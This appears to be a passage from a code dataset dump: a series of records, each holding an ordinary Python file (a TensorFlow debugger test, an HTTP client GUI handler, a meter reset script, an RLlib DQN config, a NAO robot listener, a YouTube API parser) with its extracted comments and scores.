(L|pq) and ao2mo transform to (L|ij) # support uneqaul naux on different k points # body dielectric matrix eps_body # head dielectric matrix eps_00 # wings dielectric matrix eps_P0 # inverse dielectric matrix # head correction # Find km that conserves with kn and kL (-km+kn+kL=G) # apply head correction # apply wing correction # Find km that conserves with kn and kL (-km+kn+kL=G) Compute head (G=0, G'=0) density response function in auxiliary basis at freq iw # Compute Pi head Compute wing (G=P, G'=0) density response function in auxiliary basis at freq iw # Compute Pi wing Compute qij = 1/Omega * |< psi_{ik} | e^{iqr} | psi_{ak-q} >|^2 at q: (nkpts, nocc, nvir) through kp perturbtation theory Ref: Phys. Rev. B 83, 245122 (2011) Scale nw Legendre roots, which lie in the interval [-1, 1], so that they lie in [0, inf) Ref: www.cond-mat.de/events/correl19/manuscripts/ren.pdf Returns: freqs : 1D ndarray wts : 1D ndarray Clenshaw-Curtis qaudrature on [0,inf) Ref: J. Chem. Phys. 132, 234114 (2010) Returns: freqs : 1D ndarray wts : 1D ndarray Analytic continuation to real axis using a two-pole model Returns: coeff: 2D array (ncoeff, norbs) #TODO: analytic gradient Analytic continuation to real axis using a Pade approximation from Thiele's reciprocal difference method Reference: <NAME>. Phys. 29, 179 (1977) Returns: coeff: 2D array (ncoeff, norbs) omega: 2D array (norbs, npade) # Analytic continuation: pade or twopole # Whether applying finite size corrections #TODO: implement frozen orbs # DF-KGW must use GDF integrals ################################################## # don't modify the following attributes, they are not input options # self.mo_energy: GW quasiparticle energy, not scf mo_energy Input: kptlist: self-energy k-points orbs: self-energy orbs nw: grid number Output: mo_energy: GW quasiparticle energy # This test takes a few minutes 0.000000 1.783500 1.783500 1.783500 0.000000 1.783500 1.783500 1.783500 0.000000 # without finite size corrections # with finite size corrections
| 1.675714
| 2
|
tensorflow/python/debug/lib/debug_grappler_test.py
|
abhaikollara/tensorflow
| 1
|
6628091
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _grappler_enabled_session_config():
"""Constructs a Session config proto that explicitly enables Grappler.
Returns:
A config proto that obtains extra safety for the unit tests in this
file by ensuring that the relevant Grappler rewrites are always enabled.
"""
rewriter_config = rewriter_config_pb2.RewriterConfig(
disable_model_pruning=False,
arithmetic_optimization=rewriter_config_pb2.RewriterConfig.ON)
graph_options = config_pb2.GraphOptions(rewrite_options=rewriter_config)
return config_pb2.ConfigProto(graph_options=graph_options)
class SessionDebugGrapplerInteractionTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SessionDebugGrapplerInteractionTest, self).setUp()
self._dump_root = tempfile.mkdtemp()
self._debug_url = "file://%s" % self._dump_root
def tearDown(self):
ops.reset_default_graph()
if os.path.isdir(self._dump_root):
file_io.delete_recursively(self._dump_root)
super(SessionDebugGrapplerInteractionTest, self).tearDown()
def testArithmeticOptimizationActive(self):
"""Tests that tfdbg can dump the tensor from nodes created by Grappler."""
with session.Session(config=_grappler_enabled_session_config()) as sess:
u = variables.VariableV1([[1, 2], [3, 4]], name="u", dtype=dtypes.float32)
# The next two ops should be optimized by Grappler into a single op:
# either an AddN op or a Mul op.
x = math_ops.add(u, u)
x = math_ops.add(x, u)
y = math_ops.multiply(x, u)
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=[self._debug_url])
run_metadata = config_pb2.RunMetadata()
run_result = sess.run(y, options=run_options, run_metadata=run_metadata)
self.assertAllClose(run_result, [[3, 12], [27, 48]])
dump_data = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs,
validate=True)
original_node_names = set([op.name for op in sess.graph.get_operations()])
dumped_node_names = set(dump_data.nodes())
grappler_created_node_names = dumped_node_names - original_node_names
grappler_removed_node_names = original_node_names - dumped_node_names
# Assert that Grappler should have replaced some of the nodes from the
# original graph with new nodes.
self.assertTrue(grappler_created_node_names)
self.assertTrue(grappler_removed_node_names)
# Iterate through the nodes created by Grappler. One of them should be
# be the result of replacing the original add ops with an AddN op or a
# Mul op.
found_optimized_node = False
for grappler_node_name in grappler_created_node_names:
node_op_type = dump_data.node_op_type(grappler_node_name)
# Look for the node created by Grappler's arithmetic optimization.
if node_op_type in ("AddN", "Mul"):
datum = dump_data.get_tensors(grappler_node_name, 0, "DebugIdentity")
self.assertEqual(1, len(datum))
self.assertAllClose(datum[0], [[3, 6], [9, 12]])
found_optimized_node = True
break
self.assertTrue(
found_optimized_node,
"Failed to find optimized node created by Grappler's arithmetic "
"optimization.")
if __name__ == "__main__":
googletest.main()
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _grappler_enabled_session_config():
"""Constructs a Session config proto that explicitly enables Grappler.
Returns:
A config proto that obtains extra safety for the unit tests in this
file by ensuring that the relevant Grappler rewrites are always enabled.
"""
rewriter_config = rewriter_config_pb2.RewriterConfig(
disable_model_pruning=False,
arithmetic_optimization=rewriter_config_pb2.RewriterConfig.ON)
graph_options = config_pb2.GraphOptions(rewrite_options=rewriter_config)
return config_pb2.ConfigProto(graph_options=graph_options)
class SessionDebugGrapplerInteractionTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SessionDebugGrapplerInteractionTest, self).setUp()
self._dump_root = tempfile.mkdtemp()
self._debug_url = "file://%s" % self._dump_root
def tearDown(self):
ops.reset_default_graph()
if os.path.isdir(self._dump_root):
file_io.delete_recursively(self._dump_root)
super(SessionDebugGrapplerInteractionTest, self).tearDown()
def testArithmeticOptimizationActive(self):
"""Tests that tfdbg can dump the tensor from nodes created by Grappler."""
with session.Session(config=_grappler_enabled_session_config()) as sess:
u = variables.VariableV1([[1, 2], [3, 4]], name="u", dtype=dtypes.float32)
# The next two ops should be optimized by Grappler into a single op:
# either an AddN op or a Mul op.
x = math_ops.add(u, u)
x = math_ops.add(x, u)
y = math_ops.multiply(x, u)
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=[self._debug_url])
run_metadata = config_pb2.RunMetadata()
run_result = sess.run(y, options=run_options, run_metadata=run_metadata)
self.assertAllClose(run_result, [[3, 12], [27, 48]])
dump_data = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs,
validate=True)
original_node_names = set([op.name for op in sess.graph.get_operations()])
dumped_node_names = set(dump_data.nodes())
grappler_created_node_names = dumped_node_names - original_node_names
grappler_removed_node_names = original_node_names - dumped_node_names
# Assert that Grappler should have replaced some of the nodes from the
# original graph with new nodes.
self.assertTrue(grappler_created_node_names)
self.assertTrue(grappler_removed_node_names)
# Iterate through the nodes created by Grappler. One of them should be
# be the result of replacing the original add ops with an AddN op or a
# Mul op.
found_optimized_node = False
for grappler_node_name in grappler_created_node_names:
node_op_type = dump_data.node_op_type(grappler_node_name)
# Look for the node created by Grappler's arithmetic optimization.
if node_op_type in ("AddN", "Mul"):
datum = dump_data.get_tensors(grappler_node_name, 0, "DebugIdentity")
self.assertEqual(1, len(datum))
self.assertAllClose(datum[0], [[3, 6], [9, 12]])
found_optimized_node = True
break
self.assertTrue(
found_optimized_node,
"Failed to find optimized node created by Grappler's arithmetic "
"optimization.")
if __name__ == "__main__":
googletest.main()
|
en
| 0.861092
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== Tests for debugger functionalities in tf.Session. Constructs a Session config proto that explicitly enables Grappler. Returns: A config proto that obtains extra safety for the unit tests in this file by ensuring that the relevant Grappler rewrites are always enabled. Tests that tfdbg can dump the tensor from nodes created by Grappler. # The next two ops should be optimized by Grappler into a single op: # either an AddN op or a Mul op. # Assert that Grappler should have replaced some of the nodes from the # original graph with new nodes. # Iterate through the nodes created by Grappler. One of them should be # be the result of replacing the original add ops with an AddN op or a # Mul op. # Look for the node created by Grappler's arithmetic optimization.
| 1.652986
| 2
|
event.py
|
akakou-hobby/tcp-client-chan
| 0
|
6628092
|
''' page/request/control.py
イベントがあった時にこっちに飛ばされる。
'''
import os
import configparser
from lib.http_client import http_client
class Event():
def __init__(self, view):
'''Viewのインスタンスを取ってくる'''
self.view = view
def button_clicked(self):
'''リクエストボタンが押されたとき'''
### 各UIの持ってる値を持ってくる
edit_text_plain = self.view.text_edit.toPlainText()
line_edit_plain = self.view.line_edit.text()
### レスポンス作成
line_text_split = line_edit_plain.split(':')
request = {
'host': line_text_split[0],
'port': int(line_text_split[1]),
'header': edit_text_plain,
'encode': 'utf-8'
}
### 通信
client = http_client.LowLayerHTTPClient(request=request)
client.connect()
client.send()
response = client.get_response()
client.close()
print(client.response['all'])
### 設定ファイルの読み込み
inifile = configparser.SafeConfigParser()
inifile.read('config.ini')
editor = inifile.get('General', 'text_editer')
count = inifile.get('General', 'count')
count = int(count)
count += 1
inifile.set('General', 'count', str(count))
### ファイル保存
f = open(str(count) + '.html', 'w')
f.write(client.response['all'])
f.close()
### メモ帳の起動
os.system(editor + ' ' + str(count) + '.html')
### 終了
exit()
|
''' page/request/control.py
イベントがあった時にこっちに飛ばされる。
'''
import os
import configparser
from lib.http_client import http_client
class Event():
def __init__(self, view):
'''Viewのインスタンスを取ってくる'''
self.view = view
def button_clicked(self):
'''リクエストボタンが押されたとき'''
### 各UIの持ってる値を持ってくる
edit_text_plain = self.view.text_edit.toPlainText()
line_edit_plain = self.view.line_edit.text()
### レスポンス作成
line_text_split = line_edit_plain.split(':')
request = {
'host': line_text_split[0],
'port': int(line_text_split[1]),
'header': edit_text_plain,
'encode': 'utf-8'
}
### 通信
client = http_client.LowLayerHTTPClient(request=request)
client.connect()
client.send()
response = client.get_response()
client.close()
print(client.response['all'])
### 設定ファイルの読み込み
inifile = configparser.SafeConfigParser()
inifile.read('config.ini')
editor = inifile.get('General', 'text_editer')
count = inifile.get('General', 'count')
count = int(count)
count += 1
inifile.set('General', 'count', str(count))
### ファイル保存
f = open(str(count) + '.html', 'w')
f.write(client.response['all'])
f.close()
### メモ帳の起動
os.system(editor + ' ' + str(count) + '.html')
### 終了
exit()
|
ja
| 1.000007
|
page/request/control.py イベントがあった時にこっちに飛ばされる。 Viewのインスタンスを取ってくる リクエストボタンが押されたとき ### 各UIの持ってる値を持ってくる ### レスポンス作成 ### 通信 ### 設定ファイルの読み込み ### ファイル保存 ### メモ帳の起動 ### 終了
| 2.723455
| 3
|
examples/set_zeroreset.py
|
MasterSpecter/ekmmeters
| 9
|
6628093
|
""" Simple example zero reset
(c) 2016 EKM Metering.
"""
from ekmmeters import *
#port and meter
my_port_name = "/dev/ttyO4"
my_meter_address = "000300001463"
#logging to console
ekm_set_log(ekm_print_log)
#open port and init
port = SerialPort(my_port_name)
if (port.initPort() == True):
my_meter = V4Meter(my_meter_address)
my_meter.attachPort(port)
else:
# no port no meter
print("Cannot open port")
exit()
if my_meter.setZeroResettableKWH():
if my_meter.request():
print(my_meter.getField(Field.Resettable_Rev_kWh_Tot))
print(my_meter.getField(Field.Resettable_kWh_Tot))
port.closePort()
|
""" Simple example zero reset
(c) 2016 EKM Metering.
"""
from ekmmeters import *
#port and meter
my_port_name = "/dev/ttyO4"
my_meter_address = "000300001463"
#logging to console
ekm_set_log(ekm_print_log)
#open port and init
port = SerialPort(my_port_name)
if (port.initPort() == True):
my_meter = V4Meter(my_meter_address)
my_meter.attachPort(port)
else:
# no port no meter
print("Cannot open port")
exit()
if my_meter.setZeroResettableKWH():
if my_meter.request():
print(my_meter.getField(Field.Resettable_Rev_kWh_Tot))
print(my_meter.getField(Field.Resettable_kWh_Tot))
port.closePort()
|
en
| 0.474745
|
Simple example zero reset (c) 2016 EKM Metering. #port and meter #logging to console #open port and init # no port no meter
| 2.714043
| 3
|
dqn.py
|
JiekaiJia/pettingzoo_comunication
| 1
|
6628094
|
""""""
from copy import deepcopy
import os
from pettingzoo.mpe import (
simple_crypto_v2,
simple_reference_v2,
simple_speaker_listener_v3,
simple_spread_v2,
simple_tag_v2,
simple_world_comm_v2,
)
import ray
from ray.rllib.agents.registry import get_trainer_class
from ray import tune
from ray.tune.registry import register_env
from utils import parallel_env, parallel_comm_env, main_comm_env, main_env
if __name__ == '__main__':
# Create test environment.
test_env = main_env(simple_speaker_listener_v3)()
# Register env
register_env('simple_spread', lambda _: main_env(simple_speaker_listener_v3)())
# The used algorithm
alg_name = 'DQN'
# Gets default training configuration.
config = deepcopy(get_trainer_class(alg_name)._default_config)
# === Settings for Rollout Worker processes ===
# Use GPUs if `RLLIB_NUM_GPUS` env var set to > 0.
config['num_gpus'] = int(os.environ.get('RLLIB_NUM_GPUS', '0'))
# Number of rollout worker actors to create for parallel sampling.
config['num_workers'] = 1
config['num_envs_per_worker'] = 4
config['render_env'] = True
# === Settings for the Trainer process ===
# Whether layers should be shared for the value function.
config['model'] = {
# 'fcnet_hiddens': [128],
'fcnet_activation': 'relu',
}
# === Environment Settings ===
config['env'] = 'simple_spread'
# the env_creator function via the register env lambda below.
# config['env_config'] = {'max_cycles': max_cycles, 'num_agents': num_agents, 'local_ratio': local_ratio}
# # === Debug Settings ===
# # Periodically print out summaries of relevant internal dataflow(DEBUG, INFO, WARN, or ERROR.)
config['log_level'] = 'DEBUG'
# === Settings for Multi-Agent Environments ===
# Configuration for multi-agent setup with policy sharing:
config['multiagent'] = {
# Map of type MultiAgentPolicyConfigDict from policy ids to tuples
# of (policy_cls, obs_space, act_space, config). This defines the
# observation and action spaces of the policies and any extra config.
'policies': {
f'{agent}': (None, test_env.observation_spaces[agent], test_env.action_spaces[agent], {}) for agent in test_env.agents
},
# Function mapping agent ids to policy ids.
'policy_mapping_fn': lambda agent_id: f'{agent_id}',
}
# Initialize ray and trainer object
ray.init(
ignore_reinit_error=True,
# log_to_driver=False
)
# Stop criteria
stop = {
# "episode_reward_mean": -115,
"training_iteration": 700,
}
# Train
results = tune.run(
alg_name,
stop=stop,
config=config,
checkpoint_at_end=True,
checkpoint_freq=1,
local_dir='./ray_results',
# restore='/home/jiekaijia/PycharmProjects/pettingzoo_comunication/ray_results/DQN/DQN_simple_spread_91f8e_00000_0_2021-06-07_14-33-32/checkpoint_000008/checkpoint-8',
num_samples=1
)
# Get the tuple of checkpoint_path and metric
checkpoints = results.get_trial_checkpoints_paths(
trial=results.get_best_trial("episode_reward_mean", mode="max"),
metric="episode_reward_mean"
)
ray.shutdown()
|
""""""
from copy import deepcopy
import os
from pettingzoo.mpe import (
simple_crypto_v2,
simple_reference_v2,
simple_speaker_listener_v3,
simple_spread_v2,
simple_tag_v2,
simple_world_comm_v2,
)
import ray
from ray.rllib.agents.registry import get_trainer_class
from ray import tune
from ray.tune.registry import register_env
from utils import parallel_env, parallel_comm_env, main_comm_env, main_env
if __name__ == '__main__':
# Create test environment.
test_env = main_env(simple_speaker_listener_v3)()
# Register env
register_env('simple_spread', lambda _: main_env(simple_speaker_listener_v3)())
# The used algorithm
alg_name = 'DQN'
# Gets default training configuration.
config = deepcopy(get_trainer_class(alg_name)._default_config)
# === Settings for Rollout Worker processes ===
# Use GPUs if `RLLIB_NUM_GPUS` env var set to > 0.
config['num_gpus'] = int(os.environ.get('RLLIB_NUM_GPUS', '0'))
# Number of rollout worker actors to create for parallel sampling.
config['num_workers'] = 1
config['num_envs_per_worker'] = 4
config['render_env'] = True
# === Settings for the Trainer process ===
# Whether layers should be shared for the value function.
config['model'] = {
# 'fcnet_hiddens': [128],
'fcnet_activation': 'relu',
}
# === Environment Settings ===
config['env'] = 'simple_spread'
# the env_creator function via the register env lambda below.
# config['env_config'] = {'max_cycles': max_cycles, 'num_agents': num_agents, 'local_ratio': local_ratio}
# # === Debug Settings ===
# # Periodically print out summaries of relevant internal dataflow(DEBUG, INFO, WARN, or ERROR.)
config['log_level'] = 'DEBUG'
# === Settings for Multi-Agent Environments ===
# Configuration for multi-agent setup with policy sharing:
config['multiagent'] = {
# Map of type MultiAgentPolicyConfigDict from policy ids to tuples
# of (policy_cls, obs_space, act_space, config). This defines the
# observation and action spaces of the policies and any extra config.
'policies': {
f'{agent}': (None, test_env.observation_spaces[agent], test_env.action_spaces[agent], {}) for agent in test_env.agents
},
# Function mapping agent ids to policy ids.
'policy_mapping_fn': lambda agent_id: f'{agent_id}',
}
# Initialize ray and trainer object
ray.init(
ignore_reinit_error=True,
# log_to_driver=False
)
# Stop criteria
stop = {
# "episode_reward_mean": -115,
"training_iteration": 700,
}
# Train
results = tune.run(
alg_name,
stop=stop,
config=config,
checkpoint_at_end=True,
checkpoint_freq=1,
local_dir='./ray_results',
# restore='/home/jiekaijia/PycharmProjects/pettingzoo_comunication/ray_results/DQN/DQN_simple_spread_91f8e_00000_0_2021-06-07_14-33-32/checkpoint_000008/checkpoint-8',
num_samples=1
)
# Get the tuple of checkpoint_path and metric
checkpoints = results.get_trial_checkpoints_paths(
trial=results.get_best_trial("episode_reward_mean", mode="max"),
metric="episode_reward_mean"
)
ray.shutdown()
|
en
| 0.651787
|
# Create test environment. # Register env # The used algorithm # Gets default training configuration. # === Settings for Rollout Worker processes === # Use GPUs if `RLLIB_NUM_GPUS` env var set to > 0. # Number of rollout worker actors to create for parallel sampling. # === Settings for the Trainer process === # Whether layers should be shared for the value function. # 'fcnet_hiddens': [128], # === Environment Settings === # the env_creator function via the register env lambda below. # config['env_config'] = {'max_cycles': max_cycles, 'num_agents': num_agents, 'local_ratio': local_ratio} # # === Debug Settings === # # Periodically print out summaries of relevant internal dataflow(DEBUG, INFO, WARN, or ERROR.) # === Settings for Multi-Agent Environments === # Configuration for multi-agent setup with policy sharing: # Map of type MultiAgentPolicyConfigDict from policy ids to tuples # of (policy_cls, obs_space, act_space, config). This defines the # observation and action spaces of the policies and any extra config. # Function mapping agent ids to policy ids. # Initialize ray and trainer object # log_to_driver=False # Stop criteria # "episode_reward_mean": -115, # Train # restore='/home/jiekaijia/PycharmProjects/pettingzoo_comunication/ray_results/DQN/DQN_simple_spread_91f8e_00000_0_2021-06-07_14-33-32/checkpoint_000008/checkpoint-8', # Get the tuple of checkpoint_path and metric
| 1.933626
| 2
|
FirstShot/Listen.py
|
PengZhang0/Bipedal-robot-relay-racing-motion-system-based-on-OpenCV-and-NAOqi-OS
| 0
|
6628095
|
# coding=utf-8
import Walk
import time
import NewWalk
import Utils
import numpy as np
from threading import Lock, Thread, Event
from Config import CommonConfig, ListenConfig, WalkConfig
import wave
# if CommonConfig.IS_DEBUG_MODEL:
# from matplotlib import pyplot as plt
# flag = 1 # 信号指示灯,如果某一时刻的响度大于这个阈值,flag会变成0,代表机器人可以开跑了
# lock = Lock() # 锁对象,用于同步
# event = Event()
def function():
while True:
print 'start recording...'
try:
Utils.record.startMicrophonesRecording(
ListenConfig.RECORD_PATH, # 录音文件保存地址
ListenConfig.RECORD_TYPE, # 录音保存格式
ListenConfig.RECORD_FREQUENCY, # 录音频率
ListenConfig.RECORD_PASSAGEWAY # 录音通道
)
except BaseException as e:
print e
Utils.record.stopMicrophonesRecording()
Utils.record.startMicrophonesRecording(
ListenConfig.RECORD_PATH, # 录音文件保存地址
ListenConfig.RECORD_TYPE, # 录音保存格式
ListenConfig.RECORD_FREQUENCY, # 录音频率
ListenConfig.RECORD_PASSAGEWAY # 录音通道
)
time.sleep(ListenConfig.RECORD_DELAY) # 延迟,录音
Utils.record.stopMicrophonesRecording() # 结束录音
if CommonConfig.IS_DEBUG_MODEL:
Utils.get_file(ListenConfig.RECORD_PATH, ListenConfig.LOCAL_PATH) # NAO机器人上传文件到本地
else:
pass # 如果在NAO机器人上运行的话就什么也不做
print 'record over'
#######################################################################
print 'get loudness begin...'
try:
if CommonConfig.IS_DEBUG_MODEL:
f = wave.open(ListenConfig.LOCAL_PATH, "rb") # Debug模式,在本地找文件
else:
f = wave.open(ListenConfig.RECORD_PATH, "rb") # 非Debug模式,在NAO机器人上找文件
frames = f.getnframes() # 读取帧数
str_data = f.readframes(frames) # 读取全部帧
f.close()
wave_data = np.fromstring(str_data, dtype=np.int16) # 获取正弦波列表
max_score = wave_data.max() # 最大响度
print '最大响度为', max_score
# if CommonConfig.IS_DEBUG_MODEL: # 如果是Debug模式,则会显示声波图
# x = range(1, wave_data.__len__() + 1)
# plt.plot(x, wave_data)
# plt.show()
if max_score > ListenConfig.LOUDNESS_THRESHOLD: # 判断当前最大响度是否大于阈值
break
except BaseException as e:
print e
print 'get loudness over'
def run(): # 运行函数
Walk.rest()
Utils.say('in monitor...')
function() # 监听哨声
# Utils.say('Go...') # 听到哨声要做的事
# start_time = time.time()
# Walk.move(WalkConfig.INIT_RUN_COUNT, 0, 0, WalkConfig.g_moveConfig6) # 初始化调整
# time.sleep(1)
Walk.run() # 开跑!
Utils.send_massage()
# end_time = time.time()
# cost_time = end_time - start_time
# print '从听到哨声到跑完共花费时间:{}秒'.format(cost_time)
|
# coding=utf-8
import Walk
import time
import NewWalk
import Utils
import numpy as np
from threading import Lock, Thread, Event
from Config import CommonConfig, ListenConfig, WalkConfig
import wave
# if CommonConfig.IS_DEBUG_MODEL:
# from matplotlib import pyplot as plt
# flag = 1 # 信号指示灯,如果某一时刻的响度大于这个阈值,flag会变成0,代表机器人可以开跑了
# lock = Lock() # 锁对象,用于同步
# event = Event()
def function():
while True:
print 'start recording...'
try:
Utils.record.startMicrophonesRecording(
ListenConfig.RECORD_PATH, # 录音文件保存地址
ListenConfig.RECORD_TYPE, # 录音保存格式
ListenConfig.RECORD_FREQUENCY, # 录音频率
ListenConfig.RECORD_PASSAGEWAY # 录音通道
)
except BaseException as e:
print e
Utils.record.stopMicrophonesRecording()
Utils.record.startMicrophonesRecording(
ListenConfig.RECORD_PATH, # 录音文件保存地址
ListenConfig.RECORD_TYPE, # 录音保存格式
ListenConfig.RECORD_FREQUENCY, # 录音频率
ListenConfig.RECORD_PASSAGEWAY # 录音通道
)
time.sleep(ListenConfig.RECORD_DELAY) # 延迟,录音
Utils.record.stopMicrophonesRecording() # 结束录音
if CommonConfig.IS_DEBUG_MODEL:
Utils.get_file(ListenConfig.RECORD_PATH, ListenConfig.LOCAL_PATH) # NAO机器人上传文件到本地
else:
pass # 如果在NAO机器人上运行的话就什么也不做
print 'record over'
#######################################################################
print 'get loudness begin...'
try:
if CommonConfig.IS_DEBUG_MODEL:
f = wave.open(ListenConfig.LOCAL_PATH, "rb") # Debug模式,在本地找文件
else:
f = wave.open(ListenConfig.RECORD_PATH, "rb") # 非Debug模式,在NAO机器人上找文件
frames = f.getnframes() # 读取帧数
str_data = f.readframes(frames) # 读取全部帧
f.close()
wave_data = np.fromstring(str_data, dtype=np.int16) # 获取正弦波列表
max_score = wave_data.max() # 最大响度
print '最大响度为', max_score
# if CommonConfig.IS_DEBUG_MODEL: # 如果是Debug模式,则会显示声波图
# x = range(1, wave_data.__len__() + 1)
# plt.plot(x, wave_data)
# plt.show()
if max_score > ListenConfig.LOUDNESS_THRESHOLD: # 判断当前最大响度是否大于阈值
break
except BaseException as e:
print e
print 'get loudness over'
def run(): # 运行函数
Walk.rest()
Utils.say('in monitor...')
function() # 监听哨声
# Utils.say('Go...') # 听到哨声要做的事
# start_time = time.time()
# Walk.move(WalkConfig.INIT_RUN_COUNT, 0, 0, WalkConfig.g_moveConfig6) # 初始化调整
# time.sleep(1)
Walk.run() # 开跑!
Utils.send_massage()
# end_time = time.time()
# cost_time = end_time - start_time
# print '从听到哨声到跑完共花费时间:{}秒'.format(cost_time)
|
zh
| 0.59256
|
# coding=utf-8 # if CommonConfig.IS_DEBUG_MODEL: # from matplotlib import pyplot as plt # flag = 1 # 信号指示灯,如果某一时刻的响度大于这个阈值,flag会变成0,代表机器人可以开跑了 # lock = Lock() # 锁对象,用于同步 # event = Event() # 录音文件保存地址 # 录音保存格式 # 录音频率 # 录音通道 # 录音文件保存地址 # 录音保存格式 # 录音频率 # 录音通道 # 延迟,录音 # 结束录音 # NAO机器人上传文件到本地 # 如果在NAO机器人上运行的话就什么也不做 ####################################################################### # Debug模式,在本地找文件 # 非Debug模式,在NAO机器人上找文件 # 读取帧数 # 读取全部帧 # 获取正弦波列表 # 最大响度 # if CommonConfig.IS_DEBUG_MODEL: # 如果是Debug模式,则会显示声波图 # x = range(1, wave_data.__len__() + 1) # plt.plot(x, wave_data) # plt.show() # 判断当前最大响度是否大于阈值 # 运行函数 # 监听哨声 # Utils.say('Go...') # 听到哨声要做的事 # start_time = time.time() # Walk.move(WalkConfig.INIT_RUN_COUNT, 0, 0, WalkConfig.g_moveConfig6) # 初始化调整 # time.sleep(1) # 开跑! # end_time = time.time() # cost_time = end_time - start_time # print '从听到哨声到跑完共花费时间:{}秒'.format(cost_time)
| 2.173033
| 2
|
pdm/builders/__init__.py
|
shidenggui/pdm
| 1
|
6628096
|
<filename>pdm/builders/__init__.py
from pdm.builders.editable import EditableBuilder # noqa
from pdm.builders.sdist import SdistBuilder # noqa
from pdm.builders.wheel import WheelBuilder # noqa
|
<filename>pdm/builders/__init__.py
from pdm.builders.editable import EditableBuilder # noqa
from pdm.builders.sdist import SdistBuilder # noqa
from pdm.builders.wheel import WheelBuilder # noqa
|
uz
| 0.446344
|
# noqa # noqa # noqa
| 1.237811
| 1
|
youtube_api/parsers.py
|
M4rkoHR/youtube-data-api
| 0
|
6628097
|
<gh_stars>0
import json
import sys
import datetime
from collections import OrderedDict
if sys.version_info[0] == 2:
from collections import Iterable
else:
from collections.abc import Iterable
from youtube_api.youtube_api_utils import parse_yt_datetime
"""
This script contains the parsers for the raw json responses
from the API. Use `raw_json` to return the output as-is.
"""
__all__ = ['raw_json',
'parse_video_metadata',
'parse_channel_metadata',
'parse_rec_video_metadata',
'parse_video_url',
'parse_subscription_descriptive',
'parse_featured_channels',
'parse_comment_metadata',
'parse_playlist_metadata',
'parse_caption_track']
def raw_json(item):
'''
Returns the raw json output from the API.
'''
return item
def raw_json_with_datetime(item):
'''
Returns the raw json output from the API.
'''
item['collection_date'] = datetime.datetime.now().strftime('%Y-%m-%d')
return item
def parse_video_metadata(item):
'''
Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_view_count, video_comment_count, video_like_count, video_dislike_count, video_thumbnail, video_tags, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
tags = item["snippet"].get('tags')
if isinstance(tags, Iterable):
video_tags = '|'.join(tags)
else:
video_tags = ''
video_meta = {
"video_id" : item['id'],
"channel_title" : item["snippet"].get("channelTitle"),
"channel_id" : item["snippet"].get("channelId"),
"video_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"video_title" : item["snippet"].get("title"),
"video_description" : item["snippet"].get("description"),
"video_category" : item["snippet"].get("categoryId"),
"video_view_count" : item["statistics"].get("viewCount"),
"video_comment_count" : item["statistics"].get("commentCount"),
"video_like_count" : item["statistics"].get("likeCount"),
"video_dislike_count" : item["statistics"].get("dislikeCount"),
"duration" : item["contentDetails"]["duration"],
"video_thumbnail" : item["snippet"]["thumbnails"]["high"]["url"],
"video_tags" : video_tags,
"collection_date" : datetime.datetime.now()
}
return video_meta
def parse_video_url(item):
'''
Parses and processes raw output and returns publish_date, video_id, channel_id, collection_date
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
publish_date = item['snippet'].get('publishedAt')
publish_date = parse_yt_datetime(publish_date)
video_id = item['snippet']['resourceId'].get('videoId')
channel_id = item['snippet'].get('channelId')
return {
"video_id" : video_id,
"channel_id" : channel_id,
